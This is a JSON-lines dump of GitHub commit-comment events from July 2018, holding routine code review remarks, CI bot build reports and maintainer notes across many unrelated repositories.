{"id":"7965080649","type":"CommitCommentEvent","actor":{"login":"TerminusBot"},"repo":{"name":"Terminus2049/Terminus2049.github.io"},"payload":{"comment":{"id":29707446,"position":null,"line":null,"path":null,"commit_id":"686990487db0b0895a97916e62dbe2a1aecae87e","created_at":"2018-07-14T02:46:11Z","updated_at":"2018-07-14T02:46:11Z","author_association":"MEMBER","body":"放错了文件夹，怪不得没出来"}},"created_at":"2018-07-14T02:46:11Z"}
{"id":"7965081126","type":"CommitCommentEvent","actor":{"login":"wwoast"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707450,"position":5,"line":5,"path":"pandas/0038_nogeyama/0126_kenken.txt","commit_id":"81a53fc0032eac3d78991c50599505e535dbe9c3","created_at":"2018-07-14T02:46:36Z","updated_at":"2018-07-14T02:46:36Z","author_association":"OWNER","body":":wink: I'm missing a lot of animals! Will add these."}},"created_at":"2018-07-14T02:46:36Z"}
{"id":"7965081781","type":"CommitCommentEvent","actor":{"login":"kristinagilday"},"repo":{"name":"kristinagilday/hello-world"},"payload":{"comment":{"id":29707452,"position":null,"line":null,"path":null,"commit_id":"db0f2797a9deb628fff5bd7a04b77c1cba32db81","created_at":"2018-07-14T02:47:09Z","updated_at":"2018-07-14T02:47:09Z","author_association":"OWNER","body":"Commmiiiiiitttttssssss"}},"created_at":"2018-07-14T02:47:09Z"}
{"id":"7965082171","type":"CommitCommentEvent","actor":{"login":"kristinagilday"},"repo":{"name":"kristinagilday/hello-world"},"payload":{"comment":{"id":29707453,"position":null,"line":null,"path":null,"commit_id":"db0f2797a9deb628fff5bd7a04b77c1cba32db81","created_at":"2018-07-14T02:47:32Z","updated_at":"2018-07-14T02:47:32Z","author_association":"OWNER","body":"Learning commits tutorial example"}},"created_at":"2018-07-14T02:47:32Z"}
{"id":"7965082201","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29707454,"position":59,"line":59,"path":"src/Renderer.java","commit_id":"e2ac71c1fb0527f2ed179f4b1c90c4031f30caef","created_at":"2018-07-14T02:47:33Z","updated_at":"2018-07-14T02:47:33Z","author_association":"NONE","body":"This is missing the `Rect p_frame` parameter. This parameter is the area of the source texture that will be drawn.\r\nUse [this](https://docs.oracle.com/javase/7/docs/api/java/awt/Graphics.html#drawImage(java.awt.Image,%20int,%20int,%20int,%20int,%20int,%20int,%20int,%20int,%20java.awt.image.ImageObserver)) method to achieve this."}},"created_at":"2018-07-14T02:47:33Z"}
{"id":"7965082950","type":"CommitCommentEvent","actor":{"login":"yoghaprs"},"repo":{"name":"sajjadjaved01/iptv"},"payload":{"comment":{"id":29707455,"position":null,"line":null,"path":null,"commit_id":"6b8d66bcb8439c6920cff2e7488b049150621799","created_at":"2018-07-14T02:48:13Z","updated_at":"2018-07-14T02:48:13Z","author_association":"NONE","body":"search bar is not working ,how to fix it"}},"created_at":"2018-07-14T02:48:13Z"}
{"id":"7965086434","type":"CommitCommentEvent","actor":{"login":"bayblu"},"repo":{"name":"bayblu/bayblu.github.io"},"payload":{"comment":{"id":29707458,"position":null,"line":null,"path":null,"commit_id":"e8703dcbf05a7e565e4b1fdc3c38b55e3f8198cb","created_at":"2018-07-14T02:50:48Z","updated_at":"2018-07-14T02:50:48Z","author_association":"OWNER","body":"background color"}},"created_at":"2018-07-14T02:50:48Z"}
{"id":"7965086560","type":"CommitCommentEvent","actor":{"login":"CaptainGlac1er"},"repo":{"name":"PHPMailer/PHPMailer"},"payload":{"comment":{"id":29707459,"position":43,"line":1079,"path":"src/SMTP.php","commit_id":"f4d37028af4b2f596847534566344b21d9b48b0d","created_at":"2018-07-14T02:50:55Z","updated_at":"2018-07-14T02:50:55Z","author_association":"NONE","body":"Why was this added? \r\nIn php 5.6.36 it is throwing this error. \r\n```\r\nPHP Warning:  stream_select(): You MUST recompile PHP with a larger value of FD_SETSIZE. It is set to 1024, but you have descriptors numbered at least as high as 1222.\\n --enable-fd-setsize=2048 is recommended, but you may want to set it to equal the maximum number of open files supported by your system,in order to avoid seeing this error again at a later date.```"}},"created_at":"2018-07-14T02:50:55Z"}
{"id":"7965087014","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29707460,"position":59,"line":59,"path":"src/Renderer.java","commit_id":"e2ac71c1fb0527f2ed179f4b1c90c4031f30caef","created_at":"2018-07-14T02:51:19Z","updated_at":"2018-07-14T02:51:19Z","author_association":"CONTRIBUTOR","body":"oh well draw.io is a butt on mobile (couldn't open it on laptop for reasons) so it was hard to see that. Add it yourself"}},"created_at":"2018-07-14T02:51:19Z"}
{"id":"7965092420","type":"CommitCommentEvent","actor":{"login":"cilame"},"repo":{"name":"cilame/vthread"},"payload":{"comment":{"id":29707464,"position":null,"line":null,"path":null,"commit_id":"0d7a2f1bc5c08b5e28e81e3726437fa57a48c6f9","created_at":"2018-07-14T02:56:27Z","updated_at":"2018-07-14T02:56:27Z","author_association":"OWNER","body":"fix bug."}},"created_at":"2018-07-14T02:56:27Z"}
{"id":"7965095036","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707466,"position":5,"line":5,"path":"pandas/0017_tama/0107_fanfan.txt","commit_id":"a9024438945ad99b2d8d4cdd9c7c4f394cd1772e","created_at":"2018-07-14T02:58:53Z","updated_at":"2018-07-14T02:58:53Z","author_association":"CONTRIBUTOR","body":"Kitaro(Ueno)\r\nHana(Fuji Safari)\r\nSakura(Kamine)\r\nSumire(Taipei)\r\nRunrun(Tama)\r\nMeimei(Chiba)\r\nMarimo(Fukuoka)"}},"created_at":"2018-07-14T02:58:53Z"}
{"id":"7965095950","type":"CommitCommentEvent","actor":{"login":"zsq15584453673"},"repo":{"name":"zsq15584453673/tensorboard"},"payload":{"comment":{"id":29707468,"position":null,"line":null,"path":null,"commit_id":"fe43d279a5aed7d25517545fd57c52df585d0454","created_at":"2018-07-14T02:59:41Z","updated_at":"2018-07-14T02:59:41Z","author_association":"OWNER","body":"import tensorflow as tf\r\nimport numpy as np\r\ndef add_layer(inputs, in_size, out_size, n_layer, activation_function=None):\r\n    # add one more layer and return the output of this layer\r\n    layer_name = 'layer%s' % n_layer\r\n    with tf.name_scope(layer_name):\r\n        with tf.name_scope('weights'):\r\n            Weights = tf.Variable(tf.random_normal([in_size, out_size]), name='W')\r\n            tf.summary.histogram(layer_name + '/weights', Weights)\r\n        with tf.name_scope('biases'):\r\n            biases = tf.Variable(tf.zeros([1, out_size]) + 0.1, name='b')\r\n            tf.summary.histogram(layer_name + '/biases', biases)\r\n        with tf.name_scope('Wx_plus_b'):\r\n            Wx_plus_b = tf.add(tf.matmul(inputs, Weights), biases)\r\n        if activation_function is None:\r\n            outputs = Wx_plus_b\r\n        else:\r\n            outputs = activation_function(Wx_plus_b, )\r\n        tf.summary.histogram(layer_name + '/outputs', outputs)\r\n    return outputs\r\n# Make up some real data\r\nx_data = np.linspace(-1,1,300)[:, np.newaxis]\r\nnoise = np.random.normal(0, 0.05, x_data.shape)\r\ny_data = x_data*4+ noise\r\n# define placeholder for inputs to network\r\nwith tf.name_scope('inputs'):\r\n    xs = tf.placeholder(tf.float32, [None, 1],name='input_x')\r\n    ys = tf.placeholder(tf.float32, [None, 1],name='input_y')\r\n\r\n# add hidden layer\r\nl1 = add_layer(xs, 1, 10, n_layer=1, activation_function=tf.nn.relu)\r\n# add output layer\r\nprediction = add_layer(l1, 10, 1, n_layer=2, activation_function=None)\r\n\r\n\r\n# the error between prediciton and real data\r\nwith tf.name_scope('loss'):\r\n    loss = tf.reduce_mean(tf.reduce_sum(tf.square(ys - prediction),\r\n                                        reduction_indices=[1]))\r\n    tf.summary.scalar('loss', loss)\r\nwith tf.name_scope('train'):\r\n    train_step = tf.train.GradientDescentOptimizer(0.1).minimize(loss)\r\n\r\nsess = tf.Session()\r\nmerged = tf.summary.merge_all()\r\n# save the logs\r\nwriter = tf.summary.FileWriter(\"logs/\", sess.graph)\r\nsess.run(tf.global_variables_initializer())\r\nfor i in range(1000):\r\n    # training\r\n    sess.run(train_step, feed_dict={xs: x_data, ys: y_data})\r\n    if i % 50 == 0:\r\n        # to see the step improvement\r\n        result = sess.run(merged,\r\n                          feed_dict={xs: x_data, ys: y_data})\r\n        writer.add_summary(result, i)"}},"created_at":"2018-07-14T02:59:41Z"}
{"id":"7966284936","type":"CommitCommentEvent","actor":{"login":"dneustadt"},"repo":{"name":"FriendsOfShopware/FroshViewSnapshots"},"payload":{"comment":{"id":29710390,"position":4,"line":50,"path":"FroshViewSnapshots.php","commit_id":"56a2b4162596d8e3f12703818c20389b4f366d31","created_at":"2018-07-14T20:00:04Z","updated_at":"2018-07-14T20:00:04Z","author_association":"MEMBER","body":"Maybe do a version compare with separate update sql files here to prevent sql errors in future versions?\r\nSee [WbmTagManager](https://github.com/webmatch/WbmTagManager/blob/master/WbmTagManager.php#L86) for reference."}},"created_at":"2018-07-14T20:00:04Z"}
{"id":"7966286654","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/hdf5-feedstock"},"payload":{"comment":{"id":29710396,"position":null,"line":null,"path":null,"commit_id":"ce4646a62d98b3e9c9fd3ac0938e91667f4306cc","created_at":"2018-07-14T20:01:13Z","updated_at":"2018-07-14T20:01:13Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @marqh were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @marqh, @marcelotrevisani were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-14T20:01:13Z"}
{"id":"7966287647","type":"CommitCommentEvent","actor":{"login":"winstonchiong"},"repo":{"name":"DecisionLabUCSF/decisionlabucsf.github.io"},"payload":{"comment":{"id":29710398,"position":9,"line":108,"path":"_data/members.yml","commit_id":"68f4dbcee092c77735f8c3c2fc39171d05353017","created_at":"2018-07-14T20:01:56Z","updated_at":"2018-07-14T20:01:56Z","author_association":"COLLABORATOR","body":"consider: `I'm involved in [projects]({{ '/projects/' | prepend: site.baseurl | prepend: site.url }}) that seek...`"}},"created_at":"2018-07-14T20:01:56Z"}
{"id":"7966288456","type":"CommitCommentEvent","actor":{"login":"irwir"},"repo":{"name":"miniupnp/miniupnp"},"payload":{"comment":{"id":29710399,"position":null,"line":null,"path":null,"commit_id":"8babc5d01310599ffdfddce09b9cbbd68e508acc","created_at":"2018-07-14T20:02:32Z","updated_at":"2018-07-14T20:02:32Z","author_association":"CONTRIBUTOR","body":"Nothing serious. For example, in VS 2017 (you might add projects for that version):\r\n```\r\nSeverity\tCode\tDescription\tProject\tFile\tLine\r\nWarning\tC4996\t'inet_addr': Use inet_pton() or InetPton() instead or define _WINSOCK_DEPRECATED_NO_WARNINGS to disable deprecated API warnings\tminiupnpc\tminiupnpc\\minissdpc.c\t548\r\n```\r\nThese warnings are anoying, but had to be tolerated for programs that were expected to run in Windows XP.\r\nOr suppresed with define or pragma.\r\nEither conditional compilation or rolling back the changes in `minissdpc.c` might be considered while Windows XP has a noticeable user base."}},"created_at":"2018-07-14T20:02:32Z"}
{"id":"7966288892","type":"CommitCommentEvent","actor":{"login":"dneustadt"},"repo":{"name":"FriendsOfShopware/FroshViewSnapshots"},"payload":{"comment":{"id":29710400,"position":11,"line":1,"path":"Resources/sql/install.sql","commit_id":"68538350023157954cb0363f2ba4e397dd737330","created_at":"2018-07-14T20:02:55Z","updated_at":"2018-07-14T20:02:55Z","author_association":"MEMBER","body":"shouldn't this be in the update.sql?"}},"created_at":"2018-07-14T20:02:55Z"}
{"id":"7966289412","type":"CommitCommentEvent","actor":{"login":"dneustadt"},"repo":{"name":"FriendsOfShopware/FroshViewSnapshots"},"payload":{"comment":{"id":29710401,"position":10,"line":10,"path":"Resources/sql/update.sql","commit_id":"68538350023157954cb0363f2ba4e397dd737330","created_at":"2018-07-14T20:03:20Z","updated_at":"2018-07-14T20:03:20Z","author_association":"MEMBER","body":"...and this should be in the install.sql"}},"created_at":"2018-07-14T20:03:20Z"}
{"id":"7966291654","type":"CommitCommentEvent","actor":{"login":"rubyglow"},"repo":{"name":"VCVRack/Rack"},"payload":{"comment":{"id":29710404,"position":null,"line":null,"path":null,"commit_id":"23f14c9f8c0d03dcc6f3e6d5ca6a982a541698cd","created_at":"2018-07-14T20:05:10Z","updated_at":"2018-07-14T20:05:10Z","author_association":"NONE","body":"Thanks, but unless there's something wrong with my eyes - shouldn't 23f14c9 be the one tagged v0.6.2b and shouldn't 478557a be the one tagged v0.6.2 ? Thanks again."}},"created_at":"2018-07-14T20:05:10Z"}
{"id":"7966294977","type":"CommitCommentEvent","actor":{"login":"joshinils"},"repo":{"name":"JDAPweb/WA-project"},"payload":{"comment":{"id":29710407,"position":null,"line":null,"path":null,"commit_id":"e55f0bf085f4f8a710d3496a33dbdca1f4d8fb34","created_at":"2018-07-14T20:08:02Z","updated_at":"2018-07-14T20:08:02Z","author_association":"COLLABORATOR","body":"closes #60 "}},"created_at":"2018-07-14T20:08:02Z"}
{"id":"7966296533","type":"CommitCommentEvent","actor":{"login":"DerekK88"},"repo":{"name":"stevengj/libctl"},"payload":{"comment":{"id":29710409,"position":94,"line":2367,"path":"utils/geom.c","commit_id":"9f09e79765f92345ad4f4f04136597b4f0e43f25","created_at":"2018-07-14T20:09:24Z","updated_at":"2018-07-14T20:09:24Z","author_association":"NONE","body":"It looks like `s` is the normal distance (from the plane to the point), and `d` is the shortest distance (in 3-dimensions) between the point and any edge of the quadrilateral.  Should this be:\r\n`if (inside==0):\r\n{ \r\n ...\r\n*min_distance = fabs(s);\r\n} else {\r\n*min_distance = fabs(d);\r\n}`\r\n?"}},"created_at":"2018-07-14T20:09:24Z"}
{"id":"7966296618","type":"CommitCommentEvent","actor":{"login":"hacdias"},"repo":{"name":"ipfs-shipyard/ipfs-webui"},"payload":{"comment":{"id":29710410,"position":null,"line":null,"path":null,"commit_id":"552bd0fbe4c7b6e5a31a8f8165103ec8d897f60a","created_at":"2018-07-14T20:09:28Z","updated_at":"2018-07-14T20:09:28Z","author_association":"MEMBER","body":"Oh my. Works flawlessly 😄 "}},"created_at":"2018-07-14T20:09:28Z"}
{"id":"7966298557","type":"CommitCommentEvent","actor":{"login":"ian-luttrell"},"repo":{"name":"ian-luttrell/lamp-site"},"payload":{"comment":{"id":29710412,"position":null,"line":null,"path":null,"commit_id":"451796dae0f2258775dc232d92bcccb3a26d0681","created_at":"2018-07-14T20:11:04Z","updated_at":"2018-07-14T20:11:04Z","author_association":"OWNER","body":"This makes sense because the Python test scripts in the “selenium” folder shouldn’t be considered when determining the primary language of the project."}},"created_at":"2018-07-14T20:11:04Z"}
{"id":"7966298704","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29710413,"position":52,"line":52,"path":"html/js/timetable.js","commit_id":"6810a99ea0909326b14198e19ef6da34e0ae7436","created_at":"2018-07-14T20:11:11Z","updated_at":"2018-07-14T20:11:11Z","author_association":"NONE","body":"https://developer.mozilla.org/ru/docs/Web/JavaScript/Reference/Statements/for...of\r\nВот лучше воспользоваться этой конструкцией, или lessens.forEach - мы жу проходили такую конструкцию\r\n\r\nДа и лучше в циклах исопльзовать let)))\r\n"}},"created_at":"2018-07-14T20:11:11Z"}
{"id":"7966299098","type":"CommitCommentEvent","actor":{"login":"AndrewBelt"},"repo":{"name":"VCVRack/Rack"},"payload":{"comment":{"id":29710414,"position":null,"line":null,"path":null,"commit_id":"23f14c9f8c0d03dcc6f3e6d5ca6a982a541698cd","created_at":"2018-07-14T20:11:30Z","updated_at":"2018-07-14T20:11:30Z","author_association":"MEMBER","body":"Thanks, fixed."}},"created_at":"2018-07-14T20:11:30Z"}
{"id":"7966299846","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29710415,"position":null,"line":null,"path":null,"commit_id":"2abee45a04c00ee88dd8108295d3cd11e86f2257","created_at":"2018-07-14T20:12:08Z","updated_at":"2018-07-14T20:12:08Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [find bonuses for collapsed objects](https://trello.com/c/jLrgCUoo/52-find-bonuses-for-collapsed-objects)"}},"created_at":"2018-07-14T20:12:08Z"}
{"id":"7966300513","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29710417,"position":71,"line":71,"path":"html/js/timetable.js","commit_id":"6810a99ea0909326b14198e19ef6da34e0ae7436","created_at":"2018-07-14T20:12:41Z","updated_at":"2018-07-14T20:12:41Z","author_association":"NONE","body":"Ох, я бы вынес бы это в константы в начало файла."}},"created_at":"2018-07-14T20:12:41Z"}
{"id":"7966301767","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29710420,"position":17,"line":134,"path":"html/css/timetable.css","commit_id":"f04168f75ae08f4ce3e32767b900800aa1adc27f","created_at":"2018-07-14T20:13:43Z","updated_at":"2018-07-14T20:13:43Z","author_association":"NONE","body":"В идеале в роцентах лучше не верстать))) Даже контейнер - лучше делать фиксированным по ширине - так реально проще."}},"created_at":"2018-07-14T20:13:43Z"}
{"id":"7966302911","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710423,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-14T20:14:39Z","updated_at":"2018-07-14T20:14:39Z","author_association":"NONE","body":"#6476-EquationFix (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2940 of 2940 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T20:14:39Z"}
{"id":"7966303408","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29710426,"position":63,"line":189,"path":"html/timetable.html","commit_id":"f04168f75ae08f4ce3e32767b900800aa1adc27f","created_at":"2018-07-14T20:15:03Z","updated_at":"2018-07-14T20:15:03Z","author_association":"NONE","body":"тогда уж лучше class=\"task lesson__task\" - блок и миксин."}},"created_at":"2018-07-14T20:15:03Z"}
{"id":"7966304132","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710431,"position":null,"line":null,"path":null,"commit_id":"ee180c57ba07a13b087f669889a842078a5e628d","created_at":"2018-07-14T20:15:34Z","updated_at":"2018-07-14T20:15:34Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2974 of 2974 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T20:15:34Z"}
{"id":"7966305045","type":"CommitCommentEvent","actor":{"login":"beyondtheinferno"},"repo":{"name":"beyondtheinferno/what-is-my-timetable"},"payload":{"comment":{"id":29710433,"position":119,"line":119,"path":"page.html","commit_id":"ecf7520c59ef575553c84e88651e00c2a7890ed6","created_at":"2018-07-14T20:16:13Z","updated_at":"2018-07-14T20:16:13Z","author_association":"OWNER","body":"Adjust the position of priority of the subject in the card"}},"created_at":"2018-07-14T20:16:13Z"}
{"id":"7966309637","type":"CommitCommentEvent","actor":{"login":"D1efe"},"repo":{"name":"D1efe/Java_EE_Application_"},"payload":{"comment":{"id":29710438,"position":null,"line":null,"path":null,"commit_id":"881c51504c9fbc0caafdbd2d1a708623fc992f79","created_at":"2018-07-14T20:19:47Z","updated_at":"2018-07-14T20:19:47Z","author_association":"OWNER","body":"Next commit will implement the suggested comments from this current commit"}},"created_at":"2018-07-14T20:19:47Z"}
{"id":"7966309960","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710439,"position":null,"line":null,"path":null,"commit_id":"ee180c57ba07a13b087f669889a842078a5e628d","created_at":"2018-07-14T20:20:07Z","updated_at":"2018-07-14T20:20:07Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T20:20:07Z"}
{"id":"7966311200","type":"CommitCommentEvent","actor":{"login":"arikff"},"repo":{"name":"arikff/my-first-calculator"},"payload":{"comment":{"id":29710442,"position":null,"line":null,"path":null,"commit_id":"14340da16a523c938e8dcb1b2cd248f500a75ecb","created_at":"2018-07-14T20:21:09Z","updated_at":"2018-07-14T20:21:09Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/41241289/42728155-947b55d0-87bc-11e8-885e-590fc12ee1fb.png)\r\n"}},"created_at":"2018-07-14T20:21:09Z"}
{"id":"7966311923","type":"CommitCommentEvent","actor":{"login":"dneustadt"},"repo":{"name":"FriendsOfShopware/FroshViewSnapshots"},"payload":{"comment":{"id":29710444,"position":13,"line":108,"path":"Resources/views/frontend/_public/src/js/view-snapshots.js","commit_id":"68538350023157954cb0363f2ba4e397dd737330","created_at":"2018-07-14T20:21:48Z","updated_at":"2018-07-14T20:21:48Z","author_association":"MEMBER","body":"Personally I like a bar that stretches over the whole width at the bottom better.\r\n\r\n```\r\nbody.insertAdjacentHTML('afterbegin', '<style>\\n    .recorder {\\n        position: fixed;\\n        width: 100%;\\n        bottom: 0;\\n        left: 0;\\n        padding: 5px;\\n        background: white;\\n        z-index: 99999;\\n        border-top: 1px solid #ccc;\\n    }\\n</style>\\n<div class=\"recorder\">\\n    <span class=\"left\" style=\"margin-right:5px\">' + state + '</span>\\n    <a onclick=\"snapshots.record()\" class=\"btn is--primary left\" style=\"margin-right:5px\">Record</a>\\n    <a onclick=\"snapshots.stop()\" class=\"btn is--primary left\">Stop Recording</a>\\n</div> ');\r\n```\r\n\r\nWhat do you think?"}},"created_at":"2018-07-14T20:21:48Z"}
{"id":"7966313321","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29710447,"position":null,"line":null,"path":null,"commit_id":"712c62384be3decb641e8993a8223f01b30d2f29","created_at":"2018-07-14T20:22:58Z","updated_at":"2018-07-14T20:22:58Z","author_association":"COLLABORATOR","body":"Puzzle `694-2b8246eb` discovered in   [`src/main/java/ru/mystamps/web/service/SeriesImportServiceImpl.java`](  https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/SeriesImportServiceImpl.java)   and submitted as #902. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-14T20:22:58Z"}
{"id":"7966313672","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29710449,"position":null,"line":null,"path":null,"commit_id":"712c62384be3decb641e8993a8223f01b30d2f29","created_at":"2018-07-14T20:23:15Z","updated_at":"2018-07-14T20:23:15Z","author_association":"COLLABORATOR","body":"Puzzle `694-cae8cc62` discovered in   [`src/main/java/ru/mystamps/web/service/SeriesInfoExtractorServiceImpl.java`](  https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/SeriesInfoExtractorServiceImpl.java)   and submitted as #903. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-14T20:23:15Z"}
{"id":"7966320227","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29710473,"position":null,"line":null,"path":null,"commit_id":"712c62384be3decb641e8993a8223f01b30d2f29","created_at":"2018-07-14T20:29:00Z","updated_at":"2018-07-14T20:29:00Z","author_association":"COLLABORATOR","body":"Puzzle `694-b7a345ad` discovered in   [`src/main/java/ru/mystamps/web/controller/dto/ImportSeriesForm.java`](  https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/controller/dto/ImportSeriesForm.java)   and submitted as #915. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-14T20:29:00Z"}
{"id":"7966320805","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29710474,"position":null,"line":null,"path":null,"commit_id":"712c62384be3decb641e8993a8223f01b30d2f29","created_at":"2018-07-14T20:29:31Z","updated_at":"2018-07-14T20:29:31Z","author_association":"COLLABORATOR","body":"Puzzle `694-5e76eadc` discovered in   [`src/main/java/ru/mystamps/web/util/CatalogUtils.java`](  https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/util/CatalogUtils.java)   and submitted as #916. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-14T20:29:31Z"}
{"id":"7966320838","type":"CommitCommentEvent","actor":{"login":"vitorgamer58"},"repo":{"name":"cryptoluka/lukapeersbackend"},"payload":{"comment":{"id":29710475,"position":null,"line":null,"path":null,"commit_id":"75f04ef33eda0783b9e13439148870f6e751c4b7","created_at":"2018-07-14T20:29:33Z","updated_at":"2018-07-14T20:29:33Z","author_association":"NONE","body":"it is possible, instead of using a competing instance of freegeoip, to install a copy of freegeoip on the machine that runs the map, following this tutorial, with the -quota-max 0 argument it is possible to make requests for IPS locations without limits."}},"created_at":"2018-07-14T20:29:33Z"}
{"id":"7966321299","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29710476,"position":null,"line":null,"path":null,"commit_id":"712c62384be3decb641e8993a8223f01b30d2f29","created_at":"2018-07-14T20:30:00Z","updated_at":"2018-07-14T20:30:00Z","author_association":"COLLABORATOR","body":"Puzzle `694-d17b3e39` discovered in   [`src/main/java/ru/mystamps/web/util/extractor/JsoupSiteParser.java`](  https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/util/extractor/JsoupSiteParser.java)   and submitted as #917. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-14T20:30:00Z"}
{"id":"7966323527","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"NikolayNN/test-generator-sb"},"payload":{"comment":{"id":29710484,"position":16,"line":16,"path":"src/main/java/my/nhorushko/testgeneratorsb/testgeneratorsb/shell/AppCommands.java","commit_id":"873b732e77fcc3981ec39b9291c9c32dc6dfb8bb","created_at":"2018-07-14T20:31:41Z","updated_at":"2018-07-14T20:31:41Z","author_association":"NONE","body":"Да, вполне."}},"created_at":"2018-07-14T20:31:41Z"}
{"id":"7966324057","type":"CommitCommentEvent","actor":{"login":"mbrown711"},"repo":{"name":"mbrown711/MOOC-Exercise-44"},"payload":{"comment":{"id":29710485,"position":42,"line":21,"path":"Exercise44.java","commit_id":"ad9ddd0327e639d652f2eb4f901239de466de228","created_at":"2018-07-14T20:32:08Z","updated_at":"2018-07-14T20:32:08Z","author_association":"OWNER","body":"need to remember not to re-declare variables - once they've been declared above, they don't need to be declared again"}},"created_at":"2018-07-14T20:32:08Z"}
{"id":"7966324113","type":"CommitCommentEvent","actor":{"login":"tudor2k3"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29710486,"position":null,"line":null,"path":null,"commit_id":"0ad52903890fe680307b46f4051bdd91d8aaffd5","created_at":"2018-07-14T20:32:10Z","updated_at":"2018-07-14T20:32:10Z","author_association":"NONE","body":"Hello, \r\n     Can you please confirm this patch is enough for building without X support? Or were there additional changes not specified in this commit?\r\n             Thank you."}},"created_at":"2018-07-14T20:32:10Z"}
